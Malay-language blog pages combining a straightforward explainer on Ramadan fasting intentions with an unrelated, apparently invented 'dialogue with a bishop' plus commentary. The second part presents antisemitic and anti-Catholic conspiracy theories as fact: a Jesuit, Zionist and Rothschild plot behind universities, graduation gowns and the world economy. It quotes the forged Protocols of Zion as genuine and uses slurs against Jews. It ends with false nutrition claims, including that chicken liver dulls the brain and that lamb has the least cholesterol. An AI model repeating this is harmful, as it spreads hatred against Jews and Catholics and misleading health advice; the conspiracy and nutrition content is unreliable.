‘Ibadah Puasa di Bulan Ramadhan


Puasa (bahasa Arab: صوم) secara bahasanya boleh diertikan sebagai menahan diri. Daripada segi istilah syara’ bermaksud menahan diri daripada makan atau minum untuk suatu jangkamasa tertentu.

Puasa ertinya menahan diri daripada makan dan minum serta segala perbuatan yang boleh membatalkan puasa, mulai dari terbit fajar sehinggalah terbenam matahari. Umat Islam juga dikehendaki menahan diri daripada menipu, mengeluarkan kata-kata buruk atau sia-sia, serta bertengkar atau bergaduh.

Ini kerana puasa merupakan medan latihan memupuk kesabaran, kejujuran serta bertolak ansur sesama sendiri. Secara tidak langsung amalan puasa akan menyuburkan sikap murni di dalam diri pelakunya. Adalah menjadi harapan kita agar kesemua nilai yang baik ini akan terus dipraktikkan ke bulan-bulan berikutnya.

Firman Allah S.W.T: “ Wahai orang-orang yang beriman, telah diwajibkan ke atas kamu berpuasa sebagaimana telah diwajibkan ke atas umat-umat yang sebelum kamu, semoga kamu menjadi orang-orang yang bertaqwa. “ – (Surah Al-Baqarah: 183)}}

Hadis Rasulullah s.a.w: Ditegaskan oleh Rasulullah s.a.w melalui sabdanya yang diriwayatkan oleh Ahmad, An- Nasa’i dan Al Baihaqi dari Abu Hurairah, yang bermaksud:
|” Sesungguhnya telah datang kepada kamu bulan Ramadhan bulan yang penuh berkat. Allah telah fardhukan ke atas kamu berpuasa padanya. Sepanjang bulan Ramadhan itu dibuka segala pintu Syurga dan ditutup segala pintu neraka serta dibelenggu segala syaitan…….”}}

Tidak wajib dan tidak juga sunat berniat dalam bahasa Arab, memadai dalam bahasa Melayu atau apa-apa bahasa yang kita fahami. Tetapi baik dan berpahala jika diamalkan dalam bahasa Arab dengan niat kita cinta kepada bahasa Arab sebagai bahasa Nabi Muhammad s.a.w. dan bahasa Al-Quran.

Lafaz niat puasa adalah seperti dibawah:

Lafaz setiap malam. Niat ringkas:

نَوَيْتُ صَوْمَ رَمَضَانَ لِلَّهِ تَعَالَى

Niatnya: Sahaja aku puasa Ramadhan kerana Allah Taala.

Lafaz lengkap:

نَوَيْتُ صَوْمَ غَدٍ عَنْ أَدَاءِ فَرْضِ رَمَضَانَ هَذِهِ السَّنَةِ لِلَّهِ تَعَالَى

Niatnya: Sahaja aku puasa esok hari pada bulan Ramadhan tahun ini kerana Allah Taala.

Sebenarnya bangun untuk bersahur itu sudah dikira berniat untuk berpuasa.

Lafaz niat puasa Ramadhan sepenuhnya untuk sebulan:

Lafaznya:

نَوَيْتُ صَوْمَ شَهْرِ رَمَضَانَ كِلِّهِ لِلَّهِ تَعَالَى

Niatnya: Sahaja aku berpuasa sebulan Ramadhan tahun ini kerana Allah Taala.

Digalakkan berniat puasa untuk sebulan dengan sekali niat pada malam pertama Ramadhan bagi mengelakkan daripada tidak sah puasa kerana terlupa berniat pada malamnya, kita mengikut Imam Malik yang membolehkan berniat untuk sebulan sekali gus.

Namun begitu, jika puasa Ramadhan kita terputus oleh sesuatu sebab, seperti haidh, sakit atau lain-lain, maka niat puasa sebulan itu tidak lagi memadai untuk hari-hari puasa yang seterusnya, tetapi, hendaklah diperbaharui niat apabila tidak ada lagi perkara yang menghalang daripada puasa berturut-turut tersebut. Maksudnya, dengan memperbaharui niat sekali lagi bagi semua hari-hari puasa Ramadhan yang berbaki, iaitu niatnya:
“Sahaja aku berpuasa esok dan sehingga akhir Ramadhan ini kerana Allah Ta’ala”.

Waktu berniat bermula daripada terbenam matahari, yakni masuk waktu sembahyang fardhu Maghrib hinggalah sebelum terbit fajar shadiq (waktu Subuh). Oleh itu, bolehlah dilakukan niat puasa pada mana-mana bahagian daripada waktu tersebut, walaupun semasa berbuka.

Pahala puasa Ramadhan amat besar. Orang yang meninggalkan puasa dengan sengaja, bukan saja telah melakukan satu dosa besar, bahkan dia mengalami satu kerugian yang amat besar, satu hari puasa yang ditinggalkan tersebut tidak boleh ditebus dengan apa jua cara, tidak boleh ditukar ganti, sekalipun orang yang meninggalkannya berpuasa seumur hidupnya.

Ini jelas sebagaimana sabda Nabi Muhammad Shallallahu ‘alaihi wasallam: Maksudnya: “Sesiapa berbuka satu hari pada bulan Ramadhan tanpa ada rukhshah (uzur syarak) dan tidak juga kerana sakit, dia tidak akan dapat menggantikan puasa yang ditinggalkannya itu, sekalipun dia berpuasa seumur hidup.”
(Hadis riwayat Tirmidzi, Abu Daud, Nasa’i, Ibnu Majah dan Ibnu Khuzaimah).

Wassalam…

JAZAKUMULLAHU KHAIRAN KATHIIRAA..

Dialog Muslim Dengan Bishop


Pernahkah anda mendengar tentang The Last Pope, Pope Roman Peter II, Cantus, Benidictine Order? Di sini saya ingin berkongsi cerita daripada
seorang pembaca blog rakan
seperjuangan. Diharap dengan perkongsian ini sedikit sebanyak dapat membuka mata kita tentang apa yang sebenarnya sedang terjadi pada masa sekarang.
– Ini adalah ulasan awal oleh EFERY HOLY WAR ..Seorang Blogger ..(para pembaca sekiranya hendak merujuk dialog yg asal rujuklah blog EFERY HOLY WAR ..saya ada senaraikan di ruangan link PENGKAJI DAN PEMIKIR ) .blognya bernama RISE OF ISLAM. Dan saya memetiknya kembali dari Blogger Tanya-ustaz.blogspot.com
-tetapi buat masa ini saya paparkan dialog yg asal dan diulas oleh Efery -Holy War

——————————–

Kisanya bermula begini….
2 minggu yang lepas semasa saya di New York,terjadi satu peristiwa yg telah membrainwash kan saya,cerita nya macam ini…..
semasa saya dan pak cik bersiar-siar di Kota selepas singgah di sebuah kedai, pak cik telah tercicir barang yg telah dia beli,saya pula menunggu dia di kereta tiba-tiba , terasa hendak buang air besar pula ..tak tahan giler,saya cuba hendak cari tandas , apabila saya tanya pada orang ,dia beritahu ada di situ ,balon sajalah..gereja pun gereja la tumpang berak jer..
rupa-rupanya gereja tu ada mengadakan satu ceremony,ada sebahagian orang yg memakai jubah dan topi segitiga,tengok air muka macam Yahudi laknat sahaja…lantak lah.Bila sampai rumah pak cik aku, orang yang pakai jubah setan tu ,rupa-rupanya jiran sebelah ..selang 2 rumah saja .2 minggu aku memerhati dan bertegur sapa dengan orang ni…tidak ada apa- pun yang luar biasa kehidupannya seperti orang biasa saja..sampai lah satu topik perbualan itu…
—————————————————————————————————————————————–
aku : saya ada nampak pak cik di gereja tu, tak nampak macam sembahyang,macam majlis konvo je..ada apa sebenarnya ?

jiran: oh! yg tu…memang majlis konvo utk paderi baru..orang yg berjubah putih tu JESUIT PRIEST

aku: siapa tu .. bunyi macam best jer?good looking…macam educated jer
( jiran aku senyum sampai ke pipi,macam nak ketawa tapi tidak jadi ketawa )

jiran: hmmm…org islam,1000 org ulama baru bersamaan dgn seorang JESUIT PRIEST.

aku: apa pasal pula?

jiran : org yg pandai, hebat yg ada nama semuanya ada di depan mereka seperti professor,doktor dll..dgn kata-kata yg hebat penuh ilmu dan fakta dan teori yg hebat-hebat , tu adalah perbualan harian kami 700 tahun dahulu …kemudian kami membuatkan bagaimana mahu hasilkan orang yg seperti professor,doktor dan mereka semua tu…
Sambungnya lagi ….kebijaksanaan mereka tidak akan lari dari tujuan ilmu itu kami hasilkan …seluas mana pun ia berkembang ia sebenarnya di bawah tujuan kami ,cuma mata mereka melihat ia berubah-rubah .
…..saya akan sambung lagi perbualan ini..saya berhenti di sini sebab saya hendak tanya ada sesiapa yg arif boleh tak tolong jelaskan pada saya kata-kata jiran saya tu
(jiran saya tu sebenarnya seorang bishop roman katolik yg memang ada link dengan organisasi dengan gereja Vatican City di Rome.)

——————————

Ulasan Efery

Mungkin ada pembaca yang masih belum mengetahui apakah itu Jesuit. Jesuit adalah satu aliran keagamaan di dalam Gereja Roman Katolik ataupun disebut Gereja Rom… Aliran ni pada zahirnya menjalankan misi keagamaan atas nama Jesus dan Kristian tapi sebenarnya mempunyai agenda tertentu yang amat jahat lagi licik lebih-lebih lagi Jesuit adalah antara pembantu yang paling penting dan besar peranannya kepada Iblis Laknatullah dan rakan kongsinya Dajjal Laknatullah. Ini kerana Jesuit adalah antara elemen penting dalam membangunkan plan besar New World Order yang termasuk di dalamnya Freemasonry dan Zionis Antarabangsa. Artikel penuh, sila Klik Sini!

————————————

saya sambungan perbualan itu…….

aku; tapi kan…bukan kah universiti dengan gereja tu berasingan, tidak bercampur organisasinya?…lagi pun macam mana pula paderi-paderi ini boleh transfer ilmu..tidak ada nampak pun paderi jadi lecturer di mana-mana universti di dunia ni…di kampung saya Malaysia lagi la tidak ada …paderi di Malaysia kerjanya sembahyang saja kan…

jiran; masa pra-kemerdekaan wilayah-wilayah jajahan Eropah seperti kamu….pemimpin-pemimpin kamu yg memperjuangkan kemerdekaan itu telah belajar dengan orang kami .cuba kamu perhatikan cendekiawan,ahli falsafah,ilmuan yg nama-nama mereka terpahat di dinding -dinding sekolah itu …apa yang guru-guru kamu kata kan pada waktu itu?

aku; apa yg saya ingat la mereka itu semua yg geliga kepala otaknya ,mereka tu pengasas ilmu dan mereka itu jadi macam itu sebab wujud perasaan ingin tahu yg sangat mendalam dalam jiwa mereka .

jiran; Saya pasti apa yg awak katakan itu mesti tercetak di buku-buku teks sekolah

aku; betul….maacammana pakcik tau ni?
(peh…dia seperti hendak ketawa tetapi tidak macam ketawa )

jiran; pejuang kemerdekaan lah yg bawa nama mereka supaya di kenalkan kepada kanak-kanak lagi supaya mereka mengagumi anak murid kami

aku; kenapa gereja nak mereka respect dengan cendekiawan-cendiakawan barat?… macam pak cik kan ahli gereja,kenapa tak letak nama pak cik saja kan senang..pak cik juga yg glamour nanti…
jiran; kami tak nak mereka tahu ilmu-ilmu yg diajar dari sekolah hingga universti tu adalah ilmu kami..kami reka keadaan yg menampakkan ilmu itu muncul secara sepontan ,kami mahu mereka rasa ilmu itu seolah-olah bukan datang dari kebijaksanaan agama .

aku; ish…betul juga,masa saya sekolah dulu pun saya rasa seperti semua orang mampu kalau ada sifat ingin tahu..cikgu sekolah yg ajar.

jiran; sifat ingin tau tu sebenrnya tidak wujud dalam diri cendekiawan barat…kami yg rancang supaya anda berfikir seperti itu ..masakan manusia sedunia yg pelbagai kaum dan agama mahu belajar ilmu di universiti jika mereka tahu ia adalah perancangan geraja.

aku; bunyi nya macam geraja ada kaitan dengan zaman penjajahan Eropah ke atas seluruh dunia macam British,Belanda,Sepanyol,Prancis dll…betul ke?

jiran; BETUL….
(maaf..aku terpaksa rahsiakan nama bishop ni,sebab aku telah berjanji tidak akan beritahu sesiapa kalau dia sudi cerita pada aku..utk keselamatan aku juga….)

ada sesiapa yg boleh terjemahkan apa kata -kata jiran aku tu …..

——————————————————-

Ulasan Efery

Sebenarnya apa yang dikatakan oleh Bishop itu adalah Protocol Of Zion No. 4 dan Protocol Of Zion No. 9

Protocol Of Zion No. 4

It is for this reason that we must undermine faith, eradicate from the minds of the Gentiles the very principles of God and Soul, and replace these conceptions by mathematical calculations and material desires.

Protocol Of Zion No. 9
We have fooled, bemused and corrupted the youth of the ‘Gentiles’ by rearing them in principles and theories whick are known to us to be false although it is that it is that they have been inculcated.

Contoh yang paling mudah di sini. Mereka telah memperkenalkan Teori Darwin yang bertentangan dengan agama. Insya Allah saya akan detailkan lagi Protocol Of Zion di masa akan datang.
———————————————

sambungan perbualan….

Aku; pak cik dari tadi asyik cakap “kami yg rancang….kami yg rancang” Haa….sekarang ni pak cik katalah yg semua universti di dunia ni gereja yg punya…apa bukti? …setakat cakap semua orang pun boleh…
(sepatutnya jiran aku ni paling tidak pun ada sedikit rasa tercabar…tapi raut muka dia sikit pun tak ada rasa tergugat,malah pandang aku dgn perasaan kesian…bengang betul aku)

Jiran; ada pada satu hari tu di sebuah dewan,ada ramai org,dari pemimpin,org Kenamaan hinggalah ibu bapa,keluarga dan kawan-kawan datang utk ucapkan Tahniah,berkongsi kegembiraan,kesyukuran kerana nendapat Segulung ijazah…mereka bergambar bersama,memegang ijazah dan Bunga di dada sambil melontar topi di awan dgn teriakan puas…

Aku; jadinya kenapa?

Jiran; Jubah yg mereka pakai itu adalah pakaian kami .. seluruh dunia telah mengenakan jubah kami dgn perasaan mereka begitu syahdu penuh bangga…mereka telah menjadi waris kami tanpa kami perlu wujud di depan mereka …malah mereka berebut-rebut melayakkan diri ke majlis itu
(jauh di benak aku memang kita ni kena diperbodoh-bodohkan je dengan Yahudi, ni…jubah tu memang sama,Cuma modified sikit jer)

Aku; ah….kalau saya graduate nanti saya tak mahu pakai pun jubah tu..
( tapi kalau tak pakai jubah tu pun tetap sama jer…tak ubah apa pun,belajar jugak ilmu dia)

Jiran; kalau mampu,silakan….Setiap seorang menentang jubah ini ,akan ada 1000 lagi yg akan menyarung jubah ni ,Mereka yg mengidamkan majlis inilah yg akan mempertahankan nya sendiri ..kami tidak perlu buat apa pun

Aku; gereja juga yg rugi…org Islam semakin banyak yg pandai dan boleh bersaing….

Jiran; Sudah lama kami menanti orang Islam berkata seperti itu ..bukannya mudah ,beratus tahun kami usahakan ..semakin ramai orang Islam memakai jubah kami ,semakin banyaklah terlucutnya jubah MUHAMMAD

Aku : Pak cik silap ni…..makin banyak institusi pengajian Islam di dunia ni, di kampung saya Malaysia pun banyak…

Jiran; awak tertinggal suatu ayat…. DAN ISLAM YANG UMATNYA SEMAKIN HANCUR..dan saya juga terlupa nak bertanya kepada awak sesuatu…

Aku; apa dia?

Jiran; Sekiranya ilmu yg kami lepaskan dari diri kami itu suatu kebajikan ,mengapa tidak kami sahaja kami ajarkan kepada kaum kami sahaja dan membiarkan kamu mentadbir wilayah sendiri mengikut kesukaan kamu selepas diberi kemerdekaan?
(pergh!!..terkedu aku dibuatnya …tarik nafas panjag-panjang ..killer punya soalan…aku diam seribu bahasa…)

Jiran; Tidak perlu jawab….LIDAH KAMU DAN HURUF-HURUFNYA TIDAK LAYAK SEBAGAI JAWABNYA.
( jiran aku ni boleh tepuk bahu dan gosok-gosok bahu aku…suruh aku bertenang pula)
(kalau kamu nak tau..bishop ni hidupnya sangat sederhana,macam orang kampung…tapi pegang banyak rahsia ….berbeza dgn freemason dan illuminati yg hidup berkuasa dan mewah..adakah penampilan berkuasa dan mewah ni sbg cover line supaya org tidak akan sangka Paderi-paderi Jesuit ni sebenar boss?and the bishop as the big boss?…tak berani aku nak tanya, mengelak kena bunuh je…tlg aku explain kata-kata dia yg selalu berkias-kias tu ..)

—————————————————-

Ulasan Efery

Jubah Graduasi

Pernahkah kita terfikir tentang semua ini? Atau kita hanya mengikut sahaja yang dilakukan oleh orang lain tanpa sedikitpun menyedarinya. Rasullulah pernah bersabda:

“Man tasyabbaha bi qaumin fahua minhum”.

Bermaksud : Barangsiapa yang menyerupai sesuatu kaum, maka seseorang itu terdiri dari kalangan mereka) (iaitu kaum berkenaan).

——————————–

Sambungan perbualan……

jiran; saya sangat gembira dengan cara org Islam memahami AL-QURAN.mereka membaca dengan suara yg merdu,kemudian MENDAPAT PINGAT…kami tidak memberi pingat kepada pembaca injil.

Aku; betul ke paderi-paderi jesuit,bishop pernah baca AL-QURAN dan mereka menghafaznya? Saya pernah dengar yg gereja mengkajinya…..tapi semua ke macam org islam mengkaji?…tak mungkin semua…betul tak ?
(jiran hanya senyum dan mengangukkan kepala sahaja dan termenung jauh…)

Jiran; pertama kali kami berkenalan dengan Al Quran selepas Muhammad di ambil tuhannya dan kami baca dengan telinga ,selepas itu Salahuddin mati , kami membaca dengan mata ,lidah ,hidung ,tangan ,kami dan kulit ….
Kami buka halaman pertama ,kami baca kemudian kami datang kepada dunia dan hasilkan nya…
Kemudian kami buka halaman ke 2 ,kami baca ..kemudian kami berkata …oh macamni kehidupan manusia diciptakan tuhan ..kita perlu lakukan sesuatu …kami datang kepada dunia dan hasilkan
Kemudian kami buka halaman ke 3 ,kami baca ..kemudian kami berkata alamak ..tuhan buat begini pula !! kita tidak boleh biarkan ,kita mesti buat sesuatu ..kami datang kepada dunia dan hasilkannya …begitulah sehingga halaman yg terakhir… dan siapakah kamu orang Islam pada hari ini !?
Kamu melihat dunia yg kami hasilkan tadi kemudian kamu datang kepada Al Quran kemudian kamu berkata ” Apa ayat yg aku nak guna dan tampal bila aku berhujjah di depan orang nanti …ayat ini boleh lah ..Kamu datang kepada dunia kemudian berkata ” Lihat dunia telah berlaku seperti ini ..seperti itu ..cuba rujuk ayat ini ..hadis ini
Kemudian kamu dengan bangga berkata “Inilah janji tuhan yg ayat Al Quran dijamin tidak akan berubah . Padahal kami sengaja membiarkan tulisan pada kertas itu kekal ,kemudian kami berpura -pura hendak mengubah tulisan dan berpura-pura gagal supaya kamu berkata “Inilah janji tuhan Ayat Al Quran tidak berubah
Sungguh bijaksana orang Islam ..janji tuhan disangkanya tulisan -tulisan ..membuatkan raja mereka berkuasa ke atas agama dan adat sahaja telah menyebabkan rakyatnya berharap dengan dakwat dan pena dan pada hari ini mereka berlaga dakwat siapa yg lebih pekat …pena siapa yg lebih berkilat … teramat besarlah jasa zaman penjajahan kepada tuanya ..yang teramat mulia Paus

Aku; sedap je pak cik cakap…..kalau orang-orang pak cik tak ubah tulisan pun,orang-orang kami al-hafiz dan al-hafizah sememangya dah hafaz spenuhya AL-QURAN dan terjemahanya…..yg ni pun bukan janji TUHAN ke?

Jiran; Hafazan mereka hanyalah tulisan -tulisan ..apabila kamu bertanya Al Quran kepada mereka ..ingatan mereka kembali menjadi tulisan semula ….
(jiran hampir ketawa,tapi cepat-cepat dia tutup mulut dgn tangannya,dengusan hidungnya dan matanya berlinang hampir gugurkan air mata…seperti merasakan kebodohan umat Islam betul- betul menggelikan hatinya….dan aku rasa sangat malu bila dia reaksi dia macam ni….)

Jiran; maafkan saya….tapi kalau kamu mahu lihat kebenaranya…pergi lah uji mereka

Aku ; tadi pak cik cakap membaca AL-QURAN selepas Salahudin mati(wafat)…gaya pak cik cakap “BERKENALAN DGN AL-QURAN selepas MUHAMAD DI AMBIL TUHANNYA” tu…seolah-olah orang pak cik sangat hampir dengan peristiwa itu..tak paham la saya…

Jiran; Sangatlah sukar untuk mengetahui rahsia Al Quran tanpa Muhammad ,kami sempat belajar dengan memerhati kan kawan-kawannya sahaja ,mereka begitu sebut menawan dunia ..hampir suku dunia di bawah tapak kaki Islam .
Waktu itu kami masih di padang pasir ,tiada tanah lagi untuk kami berdiri ,kerana terlalu sibuk berperang mereka telah cuai ..kami membawa diri sehelai sepinggang meninggalkan tanah yg kami cintai
Lalu kami menemui suatu bumi yg tidak pernah kami bayangkan sebelum ini ,bumi yg subur dengan tumbuhan ,sungai yg mengalir deras dan sangat sejuk dan ada benda putih turun dari langit
Kami menemui suatu kaum yg sama kulit dan wajahnya seakan kami dan kami seperti kami pernah lihat dahulu ,tapi kami lupa ..dan alangkah terkejutnya kami ,kaum itu menyembah Isa !!! Ya Isa yang kami bunuh dahulu

Aku; Dah tu apa kena mengena dengan Salahudin pula?

Jiran; Kami telah berkeluarga di sana ,dan kami telah kembali duduk di gereja ..tetapi di antara kami ..telah melakukan kesilapan besar ..kami tidak tahu bagaimana kesatria Islam mendapat tahu De Moly sebenarnya tidak menyembah Isa ! kalau begini Salahuddin tidak akan benarkan setitis pun air mani kami tumpah ke atas bumi ..habislah riwayat kami semua ..kami bermati-matian ke atas Salahuddin ….

Aku; la..macam itu ke…,Apa pula yg dimaksudkan mem baca AL-QURAN dgn mata,lidah,hidung,tangan,kaki dan kulit tu …?
(jiran hanya angukkan kepala dan tersenyum puas..spt ada satu kejayaan besar)

Jiran; Ya .. ya penyembah Isa telah kami tawan ,Salahuddin telah kami tewaskan …dan sekarang kami perlu
uruskan Al Quran pula …kami telah laksanakan Al Quran itu satu persatu mengikut giliran , …dari satu ayat ke satu ayat ,dari satu surah kepada satu surah sehinggalah wahyu terakhir kepada Muhammad .
Hampir 500 tahun kami berusaha untuk sampai kepada wahyu yg ke dua terakhir ..ia telah dilaksanakan dan yg teramat sukar mengerah kudrat kami seadanya adalah melaksanakan wahyu yg terakhir….

Aku; kenapa boleh ada yg pertama lah,yg kedua terakhir lah..selepas itu yg terakhir…mengapa org pak cik tidak buat semua sekali….

Jiran; Kejayaan semua wahyu bergantung kepada keberhasilan wahyu yg terakhir..jika wahyu terakhir gagal maka lahirlah seorang lagi Muhammad

Aku : Apakah wahyu terakhir itu sampai org-org pak cik rasa ia seolah-seolah menentukan Hidup atau mati
gereja?
(saya tidak fikir jiran saya itu akan sanggup membaca ayat-ayat suci AL-QURAN dgn lidah sendiri,ia bertentangan dgn status dirinya….tetapi jangkaan saya meleset,saya amat terkejut)

Jiran; “Hai orang-orang yang beriman, bertakwalah keapada Allah dan tinggalkan sisa riba (yang belum dipungut) jika kamu orang-orang yang beriman…Dan peliharalah dirimu dari (azab yang terjadi pada) hari yang pada waktu itu kamu semua dikembalikan kepada Allah. Kemudian masing-masing diri diberi balasan yang sempurna terhadap apa yang telah dikerjakannya, sedang mereka sedikitpun tidak dianiaya (dirugikan)…..(surah Al-Baqarah: 278-281)
Melaksanakan wahyu terakhir akan menyebabkan gerjea kelihatan terlalu berkuasa …sangat bahaya jika disedari oleh manusia …kami telah melahirkan satu kaum di dalam genggaman kami …mesyuarat itu dihadiri oleh beribu-ribu orang anak murid kami ..
Ketika itu Paus telah menyerahkan amanah yg sangat besar ini agar kami boleh tidur sehinggalah Muhammad kembali semula .
Di antara anak murid kami telah menyahut ..serahkan kepada saja hal itu kepada saya ,dan saya tidak peduli bagaimana ia akan dilaksanakan ..kami telah turunkan ilmu Al Quran kepada mereka semua .

Aku; siapakah org yg berani menyahut amanah tu?..ni mesti bukan calang-calang punya org…

Jiran; ya…dia telah dididik dgn sempurna,dia bernama…… MAYER ROTHSCHILD…Kami menyerahkan Surah Baqoroh ( ayat 278-281) kepadanya untuk dilaksanakan …

Aku;Apa status dia? ,apa lebihnya dia dari anak murid yg lain..

Jiran; Bersamanya kami mengarahkan Jesuit memberi pedoman …Kami gelarkan dia “THE GUARDIAN OF THE VATICAN TREASURY”…sudah hampir 300 tahun ,sedikit tahun lagi untuk merasa keberhasilannya .

Aku; saya nak tanya la…tetapi soalan ini akan membuatkan pak cik nampak seperti org bodoh…

Jiran; tanyalah…sebab dari awal kita berbual,Islam telah kelihatan bodoh..

Aku; Kenapa pak cik begitu mudah menceritakan kepada saya ,kalau Paus tahu macammana ,kalau saya cerita satu dunia macamnana ? …pak cik juga yg susah nanti …

Jiran; Saya tidak perlu tipu awak ..umat Islam sudah tidak mampu melakukan apa-apa pun ..lainlah kalau awak kawan-kawan Muhammad ,sekarang juga kami bunuh .…

( pergh…ngeri kata-kata dia ni…dengar dia sebut nama Rothschid jer,aku dah gigil,dengan siapalah aku sedang bercakap ni…para pembaca nilai kan sendiri la kata-kata itu )

——————————

Ulasan Efery

Jika dilihat dari perbualan di atas, mereka telah memilih Rotchild untuk melaksanakan Surah Al-Baqarah 278-281 untuk dilaksanakan.
Wahai orang-orang yang beriman! Bertaqwalah kamu kepada Allah dan tinggalkanlah (jangan menuntut lagi) saki baki riba (yang masih ada pada orang yang berhutang) itu, jika benar kamu orang- orang yang beriman. Oleh itu, kalau kamu tidak juga melakukan (perintah mengenai larangan riba itu), maka ketahuilah kamu: akan adanya peperangan dari Allah dan RasulNya, (akibatnya kamu tidak menemui selamat). Dan jika kamu bertaubat, maka hak kamu (yang sebenarnya) ialah pokok asal harta kamu. (Dengan yang demikian) kamu tidak berlaku zalim kepada sesiapa, dan kamu juga tidak dizalimi oleh sesiapa.
Dan jika orang yang berhutang itu sedang mengalami kesempitan hidup, maka berilah tempoh sehingga ia lapang hidupnya dan (sebaliknya) bahawa kamu sedekahkan hutang itu (kepadanya) adalah lebih baik untuk kamu, kalau kamu mengetahui (pahalanya yang besar yang kamu akan dapati kelak).
Dan peliharalah diri kamu dari huru-hara hari (kiamat) yang padanya kamu akan dikembalikan kepada Allah. Kemudian akan disempurnakan balasan tiap-tiap seorang menurut apa yang telah diusahakannya, sedang mereka tidak dikurangkan balasannya sedikitpun.

Al-Baqarah 278-281

Jika kita lihat peranan Mayor Rotchild bertepatan dengan ayat di atas yang menerangkan supaya meninggalkan riba. Sebenarnya ekonomi dunia dikawal oleh 2 keluarga Yahudi iaitu Rotchild dan Rockefeller. Mereka telah menubuhkan The Federal Reserve untuk mengawal ekonomi Amerika Syarikat dan seterusnya ekonomi dunia. Kita tidak terlepas dari riba mata wang! Inilah rancangan maha jahat mereka tanpa kita sedari. Inilah konsep Lending Money On Interest!

“..Dan sesiapa yang mengulangi lagi (perbuatan mengambil riba itu) maka mereka itulah ahli neraka, mereka KEKAL di dalamnya…”Al-Baqarah 275

——————————————————
Sambungan perbualan……

(di suatu sudut dinding rumah jiran aku itu , ada sebuah bendera yang menarik perhatian aku..kalau mengikut firasat aku berdasarkan status jiran..sudah pastiya simbol salib atau patung Jesus yg menghiasi bendera….tetapi bendera tu ada topi paus dan 2 kunci bersilang…)

Aku; pak cik…kenapa kunci begitu penting dibendera tu…apa ada dengan benda bodoh seperti kunci ni….kenapa tidak letak salib saja .. macam biasa kan?..

Jiran; yg itu ye…….. Itu bendera Vatican ..kunci dunia ..sebelum Muhammad di ambil tuhannya ,disuatu pembaringan ..dia sedang diuji dengan suatu yg amat berat ..tuhannya memberi pilihan sama ada kembali di sisinya atau diberi kunci dunia serta hidup sehingga saat kerosakkan umat akhir zaman …
Alangkah bagusnya jika Muhammad ambil kunci dunia itu ..tidak perlu kami lakukan apa-apa pun kerana ia pasti tertanggung di bahu Muhammad yg menyebabkan umatnya rosak ,tetapi Muhammad pantas mengidu kalau ia menyebabkan umatnya mendapat kecelakaan.kami rampas kunci dunia itu dan membuat giginya mengikut kesukaan kami supaya apabila Muhammad kembali nanti ,kami dapat berkata ..….
Hai Muhammad inilah kunci dunia yg tuhan kamu maksudkan ,ia telah mendatangkan kecelakaan kepada mereka ..selepas itu mereka semua meninggalkan Muhammad dan datang kepada kami .…Lalu bagaimanakah Muhamad dapat menuding jari ke arah kami ? ..Telah kami sematkan kunci itu pada bendera kami ..akan kami hadiahkan kepada Muhammad nanti …

Aku; ….adakah ini bermaksud “kunci dunia” yg Nabi Muhamad s.a.w tidak ambil tu..sekarang telah berada di tangan Vatican?

Jiran; Ya ..bukannya jiwa -jiwa kamu yg membentuk persekitaran ..tetapi persekitaran dibina untuk membina jiwa-jiwa kamu mengikut apa yg kami kehendaki .

Aku; Kalau “kunci dunia” berada di tangan org-org pak cik,macam mana pula kunci dunia ni akan merosakkan kami?
Muhammad dan kawan-kawannya membina persekitaran seperti zarah-zarah yg tersusun sebelah menyebelah dan mengikat kuat antara satu sama lain ..LUCIFER @IBLIS telah berputus asa terhadap perkara-perkara yg besar maka Muhammad mengingatkan kawan-kawannya akan perkara -perkara yang kecil .
Dan kerosakkan yg sekecil zarah telah berlaku kepada Islam sedikit selepas Muhammad di ambil tuhannya .
Kerana tuhan kepada Muhammad boleh menghitung pahala dan dosa sekecil zarah dan ikatan zarah -zarah ini boleh menjadi longgar dengan dihentam oleh daya sekecil zarah secara berterusan . Maka sekeci zarah lah kami membina dunia ini ..dan selebihnya Lucefer akan menguruskan nya
Cuba lihat kesenangan dunia ini yg tiada pada zaman Muhammad dahulu , apa yg ada di dunia sekarang inilah yg membina hati-hati dan jiwa kamu ..sedikit pun kami tidak ambil ,padahal kami yg membinanya hanya untuk kamu ..lihatlah manusia disekeliling kamu ..kebahagian mereka bergantung kepada barangan buatan kami ..ya mereka sudah tidak mengerti bagaimana mahu bahagia dengan barangan buatan tuhan ..mereka akan sujud kepada kami dan meninggalkan Muhammad …
Kami tidak perlu mempertahankan barangan buatan kami ..apabila Muhammad ingin menghancurkan nanti ..tetapi lihatlah mereka lah yg akan mempertahannya sendiri ..

sebelum itu kita dengan komen Efery ….

————————————–

Lihatlah manusia zaman sekarang. Apa yang dikejar oleh mereka? Kemewahan dan kesoronokan semata-mata! Saya tertarik dengan kata-kata dari Bishop tersebut:

Lucifer telah berputus asa terhadap perkara-perkara yg besar maka Muhamad mengingati kawan-kawanya akan perkara -perkara yg kecil ( zarah) ,dan kerosakkan sekecil zarah telah berlaku kepada Islam sedetik selepas Muhammad di ambil tuhannya .

Kerana tuhan Muhammad menghitung pahala dan dosa sekecil zarah dan ikatan zarah-zarah ini boleh menjadi loggar dengan di hentam oleh daya sekecil zarah secara berterusan …

Maka dari sekecil zarahlah kami membina dunia ini ..dan selebihnya Lucifer yg akan menguruskannya

Kata-katanya ini adalah bertepatan dengan hadis Rasullulah:

“Berwaspadalah terhadap syaitan demi keselamatan agama kamu. Dia telah berputus asa untuk menyesatkan kamu dalam perkara-perkara besar, maka berjaga-jagalah supaya kamu tidak mengikutnya dalam perkara-perkara kecil.”

Antara ‘barangan mereka’ yang telah dijadikan ikutan oleh kebanyakan dari kita.
1. Kita diajar dalam buku biologi, buku pemakanan (kajian dan terbitan para kafir ni) bahawa kalau nak dapat vitamin B dan kalau nak tambah darah kita kena makan hati haiwan dan hati ayam. tetapi sebenarnya Nabi kita tidak menggalakkan pemakanan organ dalaman. Nak ikut kafir ke nak ikut nabi kita? Sebenarnya makan hati ayam dapat melembabkan otak kita sbb hati merupakan organ dimana semua toksin akan dikumpulkan dan dineutralkan. jadi kepekatan toksin adalah tinggi di hati ayam. makanlah kita toksin tersebut serta bengaplah otak kita umat Islam sebab percaya buku sains keluaran kafir ini.

2. Kita diajar dalam sains bahawa kopi tidak bagus untuk kesihatan. Namun sebenarnya kopi adalah antara minuman kegemaran Nabi kita selain susu dan madu. Cuba tengok Yahudi, mereka minum kopi, Starbuck. Profesor di UK yang Yahudi semua ada segelas kopi dit tangan mereka.

3. Kita diajar memakan kambing tinggi kolesterol, namun kambing juga adalah makanan Nabi kita. Seolah-olah buku sains ni nak merendahkan pemakanan Nabi kita. Sebenarnya daging kambing adalah daging paling kurang kolesterol.

